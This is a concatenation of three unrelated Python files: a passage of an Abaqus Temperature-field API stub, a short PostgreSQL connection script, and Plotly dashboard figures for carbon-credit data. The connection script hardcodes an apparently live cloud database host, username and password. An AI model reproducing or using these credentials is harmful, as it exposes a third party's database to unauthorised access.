.. code-block:: python
import load
mdb.models[name].predefinedFields[name]
The corresponding analysis keywords are:
- INITIAL CONDITIONS
- TEMPERATURE
"""
# A String specifying the repository key.
name: str = ''
# A SymbolicConstant specifying how the predefined field varies spatially. Possible values
# are UNIFORM, USER_DEFINED, FROM_FILE, FIELD, FROM_FILE_AND_USER_DEFINED, and
# DISCRETE_FIELD. The default value is UNIFORM.
distributionType: SymbolicConstant = UNIFORM
# A String specifying the name of the AnalyticalField or DiscreteField object associated
# with this predefined field. The *field* argument applies only when
# *distributionType*=FIELD or *distributionType*=DISCRETE_FIELD. The default value is an
# empty string.
field: str = ''
# A Region object specifying the region to which the predefined field is applied. *Region*
# is ignored if the predefined field has an *instances* member available. *Region* is also
# ignored if the predefined field has a *distributionType* member available, and
# *distributionType*=FROM_FILE or FROM_FILE_AND_USER_DEFINED.
region: Region = Region()
def __init__(self, name: str, createStepName: str, region: Region,
distributionType: SymbolicConstant = UNIFORM,
crossSectionDistribution: SymbolicConstant = CONSTANT_THROUGH_THICKNESS,
field: str = '', amplitude: str = UNSET, fileName: str = '',
beginStep: SymbolicConstant = None, beginIncrement: SymbolicConstant = None,
endStep: SymbolicConstant = None, endIncrement: SymbolicConstant = None,
interpolate: SymbolicConstant = OFF, magnitudes: str = '',
absoluteExteriorTolerance: float = 0, exteriorTolerance: float = 0):
"""This method creates a Temperature object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].Temperature
Parameters
----------
name
A String specifying the repository key.
createStepName
A String specifying the name of the step in which the predefined field is created.
region
A Region object specifying the region to which the predefined field is applied. *Region*
is ignored if the predefined field has a *distributionType* member available, and
*distributionType*=FROM_FILE .
distributionType
A SymbolicConstant specifying how the predefined field varies spatially. Possible values
are UNIFORM, USER_DEFINED, FROM_FILE, FIELD, FROM_FILE_AND_USER_DEFINED, and
DISCRETE_FIELD. The default value is UNIFORM.
crossSectionDistribution
A SymbolicConstant specifying how the predefined field is distributed over the cross
section of the region. Possible values are
- CONSTANT_THROUGH_THICKNESS
- GRADIENTS_THROUGH_SHELL_CS
- GRADIENTS_THROUGH_BEAM_CS
- POINTS_THROUGH_SECTION
The default value is CONSTANT_THROUGH_THICKNESS.
field
A String specifying the name of the AnalyticalField or DiscreteField object associated
with this predefined field. The *field* argument applies only when
*distributionType*=FIELD or *distributionType*=DISCRETE_FIELD. The default value is an
empty string.
amplitude
A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
UNSET should be used if the predefined field has no amplitude reference. The default
value is UNSET. Note: *amplitude* should be given only if it is valid for the specified
step.
fileName
A String specifying the name of the file from which the temperature values are to be
read when *distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED.
beginStep
An Int specifying the first step from which temperature values are to be read or the
SymbolicConstant FIRST_STEP or LAST_STEP. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
beginIncrement
An Int specifying the first increment of the step set in *beginStep* or the
SymbolicConstants STEP_START or STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endStep
An Int specifying the last step from which temperature values are to be read or the
SymbolicConstants FIRST_STEP and LAST_STEP. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endIncrement
An Int specifying the last increment of the step set in *endStep* or the
SymbolicConstants STEP_START and STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
interpolate
A SymbolicConstant specifying whether to interpolate a field read from an output
database or results file. Possible values are OFF, ON or MIDSIDE_ONLY. The default value
is OFF.
magnitudes
A Sequence of Doubles specifying the temperature values when *distributionType*=UNIFORM
or FIELD. The value of the *magnitudes* argument is a function of the
*crossSectionDistribution* argument, as shown in the following list:
- If *crossSectionDistribution*=CONSTANT_THROUGH_THICKNESS then *magnitudes* is a Double
specifying the temperature.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_SHELL_CS then *magnitudes* is a
sequence of Doubles specifying the mean value and the gradient in the thickness
direction.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_BEAM_CS then *magnitudes* is a
sequence of Doubles specifying the mean value, the gradient in the N1 direction, and the
gradient in the N2 direction.
- If *crossSectionDistribution*=POINTS_THROUGH_SECTION then *magnitudes* is a sequence
of Doubles specifying the temperature at each point.
absoluteExteriorTolerance
A Float specifying the absolute value by which a driven node of the field can lie
outside the region of the elements of the global model. The default value is 0.0. This
argument cannot be used with *midside*.
exteriorTolerance
A Float specifying the fraction of the average element size in the global model by which
a driven node of the field can lie outside the region of the elements of the global
model. The default value is 0.0. This argument cannot be used with *midside*.
Returns
-------
A Temperature object.
"""
super().__init__()
pass
def move(self, fromStepName: str, toStepName: str):
"""This method moves the TemperatureState object from one step to a different step.
Parameters
----------
fromStepName
A String specifying the name of the step from which the PredefinedFieldState is moved.
toStepName
A String specifying the name of the step to which the PredefinedFieldState is moved.
Raises
------
TextError.
"""
pass
def setValues(self, distributionType: SymbolicConstant = UNIFORM,
crossSectionDistribution: SymbolicConstant = CONSTANT_THROUGH_THICKNESS,
field: str = '', amplitude: str = UNSET, fileName: str = '',
beginStep: SymbolicConstant = None, beginIncrement: SymbolicConstant = None,
endStep: SymbolicConstant = None, endIncrement: SymbolicConstant = None,
interpolate: SymbolicConstant = OFF, magnitudes: str = '',
absoluteExteriorTolerance: float = 0, exteriorTolerance: float = 0):
"""This method modifies the data for an existing Temperature object in the step where it is
created.
Parameters
----------
distributionType
A SymbolicConstant specifying how the predefined field varies spatially. Possible values
are UNIFORM, USER_DEFINED, FROM_FILE, FIELD, FROM_FILE_AND_USER_DEFINED, and
DISCRETE_FIELD. The default value is UNIFORM.
crossSectionDistribution
A SymbolicConstant specifying how the predefined field is distributed over the cross
section of the region. Possible values are
- CONSTANT_THROUGH_THICKNESS
- GRADIENTS_THROUGH_SHELL_CS
- GRADIENTS_THROUGH_BEAM_CS
- POINTS_THROUGH_SECTION
The default value is CONSTANT_THROUGH_THICKNESS.
field
A String specifying the name of the AnalyticalField or DiscreteField object associated
with this predefined field. The *field* argument applies only when
*distributionType*=FIELD or *distributionType*=DISCRETE_FIELD. The default value is an
empty string.
amplitude
A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
UNSET should be used if the predefined field has no amplitude reference. The default
value is UNSET. Note: *amplitude* should be given only if it is valid for the specified
step.
fileName
A String specifying the name of the file from which the temperature values are to be
read when *distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED.
beginStep
An Int specifying the first step from which temperature values are to be read or the
SymbolicConstant FIRST_STEP or LAST_STEP. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
beginIncrement
An Int specifying the first increment of the step set in *beginStep* or the
SymbolicConstants STEP_START or STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endStep
An Int specifying the last step from which temperature values are to be read or the
SymbolicConstants FIRST_STEP and LAST_STEP. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endIncrement
An Int specifying the last increment of the step set in *endStep* or the
SymbolicConstants STEP_START and STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
interpolate
A SymbolicConstant specifying whether to interpolate a field read from an output
database or results file. Possible values are OFF, ON or MIDSIDE_ONLY. The default value
is OFF.
magnitudes
A Sequence of Doubles specifying the temperature values when *distributionType*=UNIFORM
or FIELD. The value of the *magnitudes* argument is a function of the
*crossSectionDistribution* argument, as shown in the following list:
- If *crossSectionDistribution*=CONSTANT_THROUGH_THICKNESS then *magnitudes* is a Double
specifying the temperature.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_SHELL_CS then *magnitudes* is a
sequence of Doubles specifying the mean value and the gradient in the thickness
direction.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_BEAM_CS then *magnitudes* is a
sequence of Doubles specifying the mean value, the gradient in the N1 direction, and the
gradient in the N2 direction.
- If *crossSectionDistribution*=POINTS_THROUGH_SECTION then *magnitudes* is a sequence
of Doubles specifying the temperature at each point.
absoluteExteriorTolerance
A Float specifying the absolute value by which a driven node of the field can lie
outside the region of the elements of the global model. The default value is 0.0. This
argument cannot be used with *midside*.
exteriorTolerance
A Float specifying the fraction of the average element size in the global model by which
a driven node of the field can lie outside the region of the elements of the global
model. The default value is 0.0. This argument cannot be used with *midside*.
"""
pass
def setValuesInStep(self, stepName: str, field: str = '', amplitude: str = UNSET, fileName: str = '',
beginStep: SymbolicConstant = None, beginIncrement: SymbolicConstant = None,
endStep: SymbolicConstant = None, endIncrement: SymbolicConstant = None,
interpolate: SymbolicConstant = OFF, magnitudes: str = '',
absoluteExteriorTolerance: float = 0, exteriorTolerance: float = 0):
"""This method modifies the propagating data for an existing Temperature object in the
specified step.
Parameters
----------
stepName
A String specifying the name of the step in which the predefined field is modified.
field
A String specifying the name of the AnalyticalField or DiscreteField object associated
with this predefined field. The *field* argument applies only when
*distributionType*=FIELD or *distributionType*=DISCRETE_FIELD. The default value is an
empty string.
amplitude
A String or the SymbolicConstant UNSET specifying the name of the amplitude reference.
UNSET should be used if the predefined field has no amplitude reference. The default
value is UNSET. Note: *amplitude* should be given only if it is valid for the specified
step.
fileName
A String specifying the name of the file from which the temperature values are to be
read when *distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED.
beginStep
An Int specifying the first step from which temperature values are to be read or the
SymbolicConstant FIRST_STEP or LAST_STEP. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
beginIncrement
An Int specifying the first increment of the step set in *beginStep* or the
SymbolicConstants STEP_START or STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endStep
An Int specifying the last step from which temperature values are to be read or the
SymbolicConstants FIRST_STEP and LAST_STEP. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
endIncrement
An Int specifying the last increment of the step set in *endStep* or the
SymbolicConstants STEP_START and STEP_END. This argument is valid only when
*distributionType*=FROM_FILE or *distributionType*=FROM_FILE_AND_USER_DEFINED. The
default value is None.
interpolate
A SymbolicConstant specifying whether to interpolate a field read from an output
database or results file. Possible values are OFF, ON or MIDSIDE_ONLY. The default value
is OFF.
magnitudes
A Sequence of Doubles specifying the temperature values when *distributionType*=UNIFORM
or FIELD. The value of the *magnitudes* argument is a function of the
*crossSectionDistribution* argument, as shown in the following list:
- If *crossSectionDistribution*=CONSTANT_THROUGH_THICKNESS then *magnitudes* is a Double
specifying the temperature.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_SHELL_CS then *magnitudes* is a
sequence of Doubles specifying the mean value and the gradient in the thickness
direction.
- If *crossSectionDistribution*=GRADIENTS_THROUGH_BEAM_CS then *magnitudes* is a
sequence of Doubles specifying the mean value, the gradient in the N1 direction, and the
gradient in the N2 direction.
- If *crossSectionDistribution*=POINTS_THROUGH_SECTION then *magnitudes* is a sequence
of Doubles specifying the temperature at each point.
absoluteExteriorTolerance
A Float specifying the absolute value by which a driven node of the field can lie
outside the region of the elements of the global model. The default value is 0.0. This
argument cannot be used with *midside*.
exteriorTolerance
A Float specifying the fraction of the average element size in the global model by which
a driven node of the field can lie outside the region of the elements of the global
model. The default value is 0.0. This argument cannot be used with *midside*.
"""
pass
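    # A minimal usage sketch for setValuesInStep (assuming an Abaqus model
    # 'Model-1' that already contains a Temperature predefined field named
    # 'Temp-1' and a step 'Step-2'; all names here are illustrative):
    #
    #     field = mdb.models['Model-1'].predefinedFields['Temp-1']
    #     field.setValuesInStep(stepName='Step-2', magnitudes=(300.0,),
    #                           amplitude=UNSET)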
| 1cb1dc1dfa1dde6ea848a70a718d5e77d6f7abc4 | 229 | py | Python | connect.py | st0623/chat_bot | b31cd61c0273c074f1aa54af3a5370fe55a35cb2 | ["Apache-2.0"] | stars: null | issues: null | forks: null |
import psycopg2  # fixed typo: the module is psycopg2, not psycopq2
# psycopg2 takes the port as a separate argument; the credentials are kept verbatim from the original, but they belong in environment variables or a secrets store, not in source.
connection = psycopg2.connect(host="ec2-174-129-26-203.compute-1.amazonaws.com", port=5432, database="d9ulhkpdiac7bc", user="mvzgskipdsvaxp", password="6537b5845d6ce23156e60e7105bf3f9648baa097cf7208db697fcb56c53abc0e")
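# Typical follow-up (not in the original; a hedged sketch using the standard psycopg2 API):
#     cur = connection.cursor()
#     cur.execute("SELECT 1")
#     print(cur.fetchone())
#     cur.close()
#     connection.close()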
| 1cc10e4d86d587382a998fede9af7706ef7eb074 | 42,056 | py | Python | src/apps/tco2_dashboard/figures.py | originalpkbims/dash-apps | ea84cbd3e7227fb3de40cd16000838dd088343c7 | ["MIT"] | stars: 1 (2022-02-19) | issues: 12 (2022-03-11 to 2022-03-30) | forks: 3 (2022-02-05 to 2022-03-24) |
from __future__ import annotations
import plotly.express as px
import plotly.graph_objects as go
import numpy as np
import pycountry
from collections import defaultdict
from .helpers import add_px_figure
from plotly.subplots import make_subplots
from .constants import FIGURE_BG_COLOR
import pandas as pd
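# Figure builders for the tco2_dashboard Dash app: each function returns a
# dark-themed Plotly figure (indicators, bar charts, treemaps, choropleths, pies).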
def sub_plots_volume(df, last_df, title_indicator, title_graph, zero_evt_text):
    if not df.empty and df["Quantity"].sum() != 0:
fig = make_subplots(
rows=2,
cols=1,
specs=[[{"type": "domain"}], [{"type": "xy"}]],
subplot_titles=("", title_graph),
vertical_spacing=0.1,
)
fig.update_layout(font_color='white', margin=dict(t=20, b=0, l=0, r=0))
        if not last_df.empty and last_df["Quantity"].sum() != 0:
fig.add_trace(go.Indicator(
mode="number+delta",
value=sum(df['Quantity']),
title=dict(text=title_indicator, font=dict(size=12)),
number=dict(suffix="", font=dict(size=24)),
delta={'position': "bottom", 'reference': sum(
last_df['Quantity']), 'relative': True, 'valueformat': '.1%'},
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
else:
fig.add_trace(go.Indicator(
mode="number",
value=sum(df['Quantity']),
title=dict(text=title_indicator, font=dict(size=12)),
number=dict(suffix="", font=dict(size=24)),
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
add_px_figure(
px.bar(
df.groupby("Date")['Quantity'].sum().reset_index(),
x="Date",
y="Quantity",
title=title_graph,
).update_traces(marker_line_width=0),
fig,
row=2, col=1)
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(title_text="Date", showgrid=False),
yaxis=dict(title_text="Volume", showgrid=False), font_size=12,
hovermode='x unified', hoverlabel=dict(font_color='white', font_size=8),)
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
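# Example call (illustrative names; df and last_df need 'Date' and 'Quantity' columns):
#     fig = sub_plots_volume(df, last_df, "Credits Bridged (last 7 days)",
#                            "Volume over time", "No bridging events")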
def sub_plots_vintage(df, last_df, title_indicator, title_graph, zero_evt_text):
df = df[df["Vintage"] != "missing"].reset_index(drop=True)
last_df = last_df[last_df["Vintage"] != "missing"].reset_index(drop=True)
    if not df.empty:
fig = make_subplots(
rows=2,
cols=1,
specs=[[{"type": "domain"}], [{"type": "xy"}]],
subplot_titles=("", title_graph),
vertical_spacing=0.1,
)
fig.update_layout(font_color='white', margin=dict(t=20, b=0, l=0, r=0))
        if not last_df.empty:
fig.add_trace(go.Indicator(
mode="number+delta",
value=np.average(df['Vintage'], weights=df['Quantity']),
number=dict(valueformat=".1f", font=dict(size=24)),
delta={"reference": np.average(
last_df['Vintage'], weights=last_df['Quantity']), "valueformat": ".1f"},
title=dict(text=title_indicator, font=dict(size=12)),
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
else:
fig.add_trace(go.Indicator(
mode="number",
value=np.average(df['Vintage'], weights=df['Quantity']),
number=dict(valueformat=".1f", font=dict(size=24)),
title=dict(text=title_indicator, font=dict(size=12)),
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
add_px_figure(
px.bar(
df.groupby('Vintage')[
'Quantity'].sum().to_frame().reset_index(),
x='Vintage',
y='Quantity',
title=title_graph
).update_traces(marker_line_width=0),
fig,
row=2, col=1
)
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(title_text="Vintage", showgrid=False),
yaxis=dict(title_text="Volume", showgrid=False), font_size=12, hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8))
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
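# NB: this function shadows Python's built-in map(); the name is kept here
# because the dashboard presumably imports it under this name (renaming it
# would break callers).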
def map(df, zero_evt_text):
    if not df.empty:
df = df[df["Country"] != "missing"].reset_index(drop=True)
country_index = defaultdict(str, {country: pycountry.countries.search_fuzzy(country)[
0].alpha_3 for country in df.Country.astype(str).unique() if country != 'nan'})
country_volumes = df.groupby('Country')['Quantity'].sum(
).sort_values(ascending=False).to_frame().reset_index()
country_volumes['Country Code'] = [country_index[country]
for country in country_volumes['Country']]
country_volumes['text'] = country_volumes['Country Code'].astype(str)
fig = px.choropleth(country_volumes, locations="Country Code",
color="Quantity",
hover_name='Country',
# hover_data=['text'],
# custom_data=['text'],
color_continuous_scale=px.colors.sequential.Plasma,
height=360)
fig.update_layout(height=360, geo=dict(bgcolor='rgba(0,0,0,0)', lakecolor='#4E5D6C',
landcolor='darkgrey',
subunitcolor='grey'),
font_color='white', dragmode=False, paper_bgcolor=FIGURE_BG_COLOR, hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
margin=dict(t=50, b=0, l=0, r=0),
coloraxis_colorbar=dict(thickness=10, len=0.6))
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def total_volume(df, title, zero_evt_text):
    if not df.empty and df["Quantity"].sum() != 0:
fig = make_subplots(
rows=2,
cols=1,
specs=[[{"type": "domain"}], [{"type": "xy"}]],
vertical_spacing=0.1,
subplot_titles=("", "")
)
fig.update_layout(font_color='white', margin=dict(t=20, b=0, l=0, r=0))
fig.add_trace(go.Indicator(
mode="number",
value=sum(df['Quantity']),
title=dict(text=title, font=dict(size=12)),
number=dict(suffix="", font=dict(size=24)),
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
add_px_figure(
px.bar(
df.groupby("Date")['Quantity'].sum().reset_index(),
x="Date",
y="Quantity",
title=""
).update_traces(marker_line_width=0),
fig,
row=2, col=1)
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(title_text="Date", showgrid=False),
yaxis=dict(title_text="Volume", showgrid=False), hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=12)
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def total_vintage(df, zero_evt_text):
df = df[df["Vintage"] != "missing"].reset_index(drop=True)
    if not df.empty:
value = np.average(df['Vintage'], weights=df['Quantity'])
fig = make_subplots(
rows=2,
cols=1,
specs=[[{"type": "domain"}], [{"type": "xy"}]],
vertical_spacing=0.1,
subplot_titles=("", "")
)
fig.update_layout(font_color='white', margin=dict(t=20, b=0, l=0, r=0))
fig.add_trace(go.Indicator(
mode="number",
value=value,
number=dict(valueformat=".1f", font=dict(size=24)),
title=dict(text="Average Credit Vintage (total)",
font=dict(size=12)),
domain={'x': [0.25, .75], 'y': [0.6, 1]}))
add_px_figure(
px.bar(
df.groupby('Vintage')[
'Quantity'].sum().to_frame().reset_index(),
x='Vintage',
y='Quantity',
title=''
).update_traces(marker_line_width=0),
fig,
row=2, col=1
)
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(title_text="Vintage", showgrid=False),
yaxis=dict(title_text="Volume", showgrid=False), hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
)
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def methodology_volume(df, zero_evt_text):
df = df[df['Methodology'] != "missing"].reset_index(drop=True)
    if not df.empty:
fig = px.bar(
df.groupby('Methodology')[
'Quantity'].sum().to_frame().reset_index(),
x='Methodology',
y='Quantity',
title=''
)
fig.update_traces(marker_line_width=0)
fig.update_layout(height=360, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(showgrid=False),
yaxis=dict(showgrid=False), font_color='white', hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
margin=dict(t=50, b=0, l=0, r=0))
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def project_volume(df, zero_evt_text):
df = df[df['Project Type'] != "missing"].reset_index(drop=True)
    if not df.empty:
fig = px.treemap(df, path=[px.Constant("All Projects"), 'Project Type', 'Country', 'Name'], values='Quantity',
hover_data=['Name', 'Quantity'],
color_discrete_sequence=px.colors.qualitative.Antique,
height=480, title='')
fig.update_traces(textfont=dict(color='white'),
textinfo="label+value+percent parent+percent entry+percent root",
texttemplate='<br>'.join(['%{label}', 'Quantity=%{value}', '%{percentParent} of Parent',
'%{percentEntry} of Entry', '%{percentRoot} of Root']))
fig.update_layout(paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, font=dict(color='white'),
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
margin=dict(t=50, b=20, l=0, r=0))
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def project_volume_mco2(df, zero_evt_text):
df = df[df['Project Type'] != "missing"].reset_index(drop=True)
    if not df.empty:
fig = px.treemap(df, path=[px.Constant("All Projects"), 'Project Type', 'Name'], values='Quantity',
hover_data=['Name', 'Quantity'],
color_discrete_sequence=px.colors.qualitative.Antique,
height=480, title='')
fig.update_traces(textfont=dict(color='white'),
textinfo="label+value+percent parent+percent entry+percent root",
texttemplate='<br>'.join(['%{label}', 'Quantity=%{value}', '%{percentParent} of Parent',
'%{percentEntry} of Entry', '%{percentRoot} of Root']))
fig.update_layout(paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR, font=dict(color='white'),
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
margin=dict(t=20, b=20, l=0, r=0))
else:
fig = go.Figure()
fig.update_layout(height=300, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(visible=False), yaxis=dict(visible=False),
annotations=[dict(text=zero_evt_text,
font=dict(color='white'), showarrow=False)])
return fig
def pool_pie_chart(df, labels):
values = [df[f'{i} Quantity'].sum() for i in labels]
not_pool_qty = df['Total Quantity'].sum()-sum(values)
values = values + [not_pool_qty]
labels = labels + ['Not Pooled']
fig = go.Figure()
fig.add_trace(go.Pie(labels=labels, values=values, textinfo='percent', textfont=dict(
color='white', size=12), hoverlabel=dict(font_color='white', font_size=8), hole=.3))
fig.update_layout(height=360,
paper_bgcolor=FIGURE_BG_COLOR, font_color='white', font_size=8,
margin=dict(t=50, b=0, l=0, r=0),
legend=dict(x=1, font=dict(size=8)))
fig.update_traces(textposition='inside')
return fig
def bridges_pie_chart(bridges_info_dict):
labels = list(bridges_info_dict.keys())
values = [d['Dataframe']["Quantity"].sum()
for d in bridges_info_dict.values()]
fig = go.Figure()
fig.add_trace(go.Pie(labels=labels, values=values, textinfo='percent', textfont=dict(
color='white', size=12), hoverlabel=dict(font_color='white', font_size=12), hole=.3))
fig.update_layout(height=360,
paper_bgcolor=FIGURE_BG_COLOR, font_color='white', font_size=8,
margin=dict(t=50, b=0, l=0, r=0),
legend=dict(x=1, font=dict(size=12)))
fig.update_traces(textposition='inside')
return fig
def eligible_pool_pie_chart(df, pool_key):
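    # Pool vintage cutoffs as encoded below: BCT accepts vintages >= 2008, NCT >= 2012.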
if pool_key == "BCT":
df = df[df["Vintage"] >= 2008].reset_index()
elif pool_key == "NCT":
df = df[df["Vintage"] >= 2012].reset_index()
labels = [pool_key, f'NON_{pool_key}']
BCT = df[f'{pool_key} Quantity'].sum()
Non_BCT = df['Total Quantity'].sum() - BCT
values = [BCT, Non_BCT]
fig_eligible = go.Figure()
fig_eligible.add_trace(go.Pie(labels=labels, values=values, textinfo='percent', textfont=dict(
color='white', size=12), hoverlabel=dict(font_color='white', font_size=8), hole=.3))
fig_eligible.update_traces(marker=dict(colors=['red', 'green']))
fig_eligible.update_layout(height=300,
paper_bgcolor=FIGURE_BG_COLOR, font_color='white', font_size=12,
margin=dict(t=0, b=0, l=0, r=0))
return fig_eligible
def verra_vintage(df_verra, df_verra_toucan):
df_verra_toucan_grouped = df_verra_toucan.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped = df_verra.groupby(
'Vintage')['Quantity'].sum().to_frame().reset_index()
df_verra_other_grouped = df_verra_grouped.merge(df_verra_toucan_grouped, how='left', left_on="Vintage",
right_on='Vintage', suffixes=('', '_Toucan'))
df_verra_other_grouped['Quantity_Toucan'] = df_verra_other_grouped['Quantity_Toucan'].fillna(
0)
df_verra_other_grouped['Quantity'] = df_verra_other_grouped['Quantity'] - \
df_verra_other_grouped['Quantity_Toucan']
df_verra_other_grouped = df_verra_other_grouped[['Vintage', 'Quantity']]
df_verra_other_grouped['Type'] = 'Rest of Issued VCU'
df_verra_toucan_grouped['Type'] = 'Toucan Bridged Credit'
df_other_and_toucan = pd.concat(
[df_verra_toucan_grouped, df_verra_other_grouped]).reset_index()
fig = px.bar(df_other_and_toucan, x="Vintage",
y="Quantity", color="Type", title="", height=360)
fig.update_layout(height=360, paper_bgcolor=FIGURE_BG_COLOR, plot_bgcolor=FIGURE_BG_COLOR,
xaxis=dict(showgrid=False),
yaxis=dict(showgrid=False), font_color='white', hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=12,
legend=dict(title="", orientation="h", yanchor="bottom",
y=1.02, xanchor="right", x=1
))
return fig
def verra_map(df_verra, df_verra_toucan):
df_verra_toucan_grouped = df_verra_toucan.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped = df_verra.groupby(
'Country')['Quantity'].sum().to_frame().reset_index()
df_verra_grouped = df_verra_grouped.merge(df_verra_toucan_grouped, how='left', left_on="Country",
right_on='Country', suffixes=('', '_Toucan'))
df_verra_grouped['Quantity_Toucan'] = df_verra_grouped['Quantity_Toucan'].fillna(
0)
df_verra_grouped['Ratio'] = df_verra_grouped['Quantity_Toucan'] / \
df_verra_grouped['Quantity']
df_verra_grouped = df_verra_grouped[df_verra_grouped['Ratio'] != 0]
df_verra_grouped['text'] = df_verra_grouped['Country'] + '<br>' + '<br>' + \
'Tokenized Credits = ' + df_verra_grouped['Quantity_Toucan'].map('{:,.0f}'.format).astype(str) + '<br>' +\
'Verra Issued Credits = ' + df_verra_grouped['Quantity'].map('{:,.0f}'.format).astype(str) + '<br>' +\
'Ratio = ' + \
df_verra_grouped['Ratio'].map('{:.4f}'.format).astype(str) + '<br>'
df_verra_grouped = df_verra_grouped[df_verra_grouped["Country"] != ""].reset_index(
drop=True)
country_index = defaultdict(str, {country: pycountry.countries.search_fuzzy(country)[
0].alpha_3 for country in df_verra_grouped.Country.astype(str).unique()
if country != 'nan'})
df_verra_grouped['Country Code'] = [country_index[country]
for country in df_verra_grouped['Country']]
fig = px.choropleth(df_verra_grouped, locations="Country Code",
color="Ratio",
hover_name='Country',
custom_data=['text'],
color_continuous_scale=px.colors.diverging.Picnic,
height=360)
fig.update_traces(hovertemplate="%{customdata}")
fig.update_layout(height=360, geo=dict(bgcolor='rgba(0,0,0,0)', lakecolor='#4E5D6C',
landcolor='darkgrey',
subunitcolor='grey'),
font_color='white', dragmode=False, paper_bgcolor=FIGURE_BG_COLOR, hovermode='x unified',
hoverlabel=dict(font_color='white', font_size=8), font_size=8,
margin=dict(t=50, b=0, l=0, r=0),
coloraxis_colorbar=dict(thickness=10, len=0.6))
return fig
